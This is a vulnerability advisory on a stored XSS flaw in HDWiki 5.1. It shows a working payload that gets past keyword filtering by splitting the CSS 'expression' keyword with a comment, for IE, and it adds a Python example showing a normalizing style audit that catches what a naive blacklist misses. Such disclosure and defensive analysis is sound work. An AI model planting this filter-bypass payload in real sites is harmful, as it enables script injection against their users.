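### Brief description:
Stored XSS (cross-site scripting) vulnerability in hdwiki5.1
### Detailed description:
Register as a member, then edit or create an entry, and switch the edit box to source-code mode.
Inserting a comment inside `expression`, for example `expr/*XSS*/ession`, results in an XSS vulnerability. The test code is as follows:
```html
<img style="xss:expr/*xss*/ession(alert('xss'))">
```
This works in the IE browser.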
[![3.jpg](https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg)](https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg)
[![4.jpg](https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg)](https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg)
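Why a comment inside the keyword matters for filtering, shown as an added example that is not HDWiki's code or part of the original report: a raw-text keyword match misses the test string above, while a check that normalizes the style value first (comments removed, and, going slightly beyond the case on this page, CSS backslash escapes decoded) flags it. The `naive_filter_allows` blacklist is an assumption about how such a filter might look; all function names here are hypothetical.

```python
import re
from html.parser import HTMLParser

# Constructed inputs: the test string from this page and a harmless style.
PAGE_SAMPLE = """<img style="xss:expr/*xss*/ession(alert('xss'))">"""
BENIGN_SAMPLE = '<p style="color: red; /* note */ width: 10px">text</p>'

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)


def naive_filter_allows(html):
    """Assumed keyword blacklist (hypothetical, not HDWiki's code): raw text only."""
    return re.search(r"expression\s*\(", html, re.I) is None


def normalize_css(css):
    """Reduce a style value to the token stream a CSS parser effectively sees."""
    css = CSS_COMMENT.sub("", css)  # expr/*xss*/ession -> expression

    def unescape(m):
        if m.group(1):  # hex escape: backslash followed by 1-6 hex digits
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else ""
        return m.group(2)  # backslash followed by a single character

    css = CSS_ESCAPE.sub(unescape, css)
    return re.sub(r"\s+", "", css).lower()


class StyleAudit(HTMLParser):
    """Collects (tag, style value) pairs whose normalized CSS has expression(."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # The parser has already entity-decoded attribute values.
        for name, value in attrs:
            if name == "style" and value and "expression(" in normalize_css(value):
                self.findings.append((tag, value))


def audit(html):
    parser = StyleAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    print(naive_filter_allows(PAGE_SAMPLE), audit(PAGE_SAMPLE), audit(BENIGN_SAMPLE))
```

The check covers only the construct this report describes; for stored rich text, an allowlist of permitted CSS properties (or dropping `style` attributes entirely) is the stronger control.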
### Proof of vulnerability:
[![3.jpg](https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg)](https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg)
[![4.jpg](https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg)](https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg)